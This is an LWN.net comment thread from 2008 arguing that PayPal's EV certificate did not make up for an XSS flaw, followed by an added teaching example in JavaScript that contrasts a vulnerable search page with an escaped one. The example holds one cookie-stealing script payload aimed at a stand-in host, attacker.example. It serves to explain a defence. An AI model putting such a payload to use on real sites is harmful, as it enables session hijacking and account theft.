
PayPal XSS Vulnerability Undermines EV SSL Security (Netcraft)

Posted May 19, 2008 23:48 UTC (Mon) by proski (subscriber, #104)
In reply to: PayPal XSS Vulnerability Undermines EV SSL Security (Netcraft) by clugstj
Parent article: PayPal XSS Vulnerability Undermines EV SSL Security (Netcraft)

Actually, the article doesn't say anything about PayPal reaction to the issue.



PayPal XSS Vulnerability Undermines EV SSL Security (Netcraft)

Posted May 20, 2008 11:56 UTC (Tue) by tialaramex (subscriber, #21167)

I believe the poster you're responding to means that PayPal spent money buying an EV
certificate (though by PayPal's standards it would be cheap) to re-assure users that they're
secure, but they didn't put the effort into security-by-design that is a necessary first step
before worrying about having the right kind of SSL certs.

Thus no "response" is needed, PayPal's priorities, like Microsoft's ten years ago, are quite
transparent and should warn security conscious people to stay miles away.

PayPal XSS Vulnerability Undermines EV SSL Security (Netcraft)

Posted May 20, 2008 19:22 UTC (Tue) by martinfick (subscriber, #4455)

Why's that?  When it comes down to it, technical security features are nowhere near as
important as their security process.  After all, as a user who cares what security features
paypal uses?  What matters is what they do if someone commits fraud or steals from your
account.  Just because paypal thinks that it is important to give the impression of security
to their customers, does not mean that they will not have very good customer service policies!
I am in no way implying that they do or don't have good customer service policies, simply that
it really is unrelated to their technical security mechanisms.

PayPal XSS Vulnerability Undermines EV SSL Security (Netcraft)

Posted May 21, 2008 10:07 UTC (Wed) by tialaramex (subscriber, #21167)

I agree that the process is the correct unit of security, but I think it's a mistake to
include all "customer service" in the security process per se.

When your bank replaces money which was fraudulently taken from your account that's not part
of a "security process", it's just a customer retention measure or a legal obligation. If the
bank is able to revert the fraudulent transfer then /that/ might be part of a security
process, or if they're able to identify where the money went and alert a local subsidiary to
call in the police, /that/ could be part of the security process. But just giving the customer
money so he'll stop whining isn't security.

PayPal's wider process is at fault here too, they've been telling customers that their EV cert
means better security and that they can trust the PayPal web site, but it turns out that this
wasn't actually true.

Also, "customer service" responses to fraud aren't a free lunch. If your friends routinely
fall for web-based PayPal fraud and have to recover the money through some sort of customer
service process, you can be sure that PayPal is ensuring their fees cover that "cost of
fraud". If the company is well run the executives /should/ realise that making the site secure
would be cheaper than paying for escalating rates of fraud, but I'm not comfortable assuming
that an effective monopoly like PayPal thinks that way.

PayPal XSS Vulnerability Undermines EV SSL Security (Netcraft)

Posted May 22, 2008 14:37 UTC (Thu) by clugstj (subscriber, #4020)

Thank you, that is exactly what I meant.  They bought the EV cert and touted that it increased
security, but didn't review their code to see if there were any XSS vulnerabilities in it
(apparently).
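
The thread's technical point, as an added example that is not code from the discussion, from
Netcraft or from PayPal: a reflected XSS in a hypothetical server-rendered search page, beside
the escaped form of the same template. The page name, the parameter and the attacker payload are
constructed for illustration; nothing here describes the actual PayPal flaw. The point the
example makes is the one tialaramex and clugstj are arguing: an EV certificate authenticates the
server and encrypts the channel, and says nothing about what that authenticated server writes
into the page, so the injected script runs in the site's origin with the green bar still showing.

```javascript
// Added example (not from the LWN thread, Netcraft or PayPal): reflected XSS in
// server-side HTML rendering and its escaped counterpart. Runs under Node.js
// with no dependencies.

// Hypothetical search-results page that echoes the query back to the user.
// Vulnerable: the untrusted parameter is concatenated straight into the markup.
function renderVulnerable(query) {
  return `<html><body><h1>Results for: ${query}</h1></body></html>`;
}

// Minimal entity encoding for text placed between HTML tags. Values placed in
// attributes, URLs or inline JavaScript need context-specific encoders as well.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: the same template, with the untrusted value encoded for its context.
function renderHardened(query) {
  return `<html><body><h1>Results for: ${escapeHtml(query)}</h1></body></html>`;
}

// Rough check used only in this example: does the rendered page contain a
// script element the template did not put there? A real code review or
// scanner would parse the document rather than pattern-match it.
function containsInjectedScript(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed attacker input, as it would arrive in a URL query parameter.
// The TLS certificate, EV or otherwise, is irrelevant to whether this executes.
const PAYLOAD =
  '<script>document.location="https://attacker.example/?c="+document.cookie</script>';

// Render both versions with the same payload and report whether the script survived.
function demo() {
  const vulnerable = renderVulnerable(PAYLOAD);
  const hardened = renderHardened(PAYLOAD);
  return {
    vulnerableInjected: containsInjectedScript(vulnerable), // true
    hardenedInjected: containsInjectedScript(hardened),     // false
    hardened,
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Running it shows the unescaped page carrying a live script element and the escaped page
carrying only the literal text `&lt;script&gt;...`; a browser renders the latter as harmless
characters in the heading. This is the kind of output-encoding review that a certificate
purchase cannot substitute for.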

Copyright © 2008, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds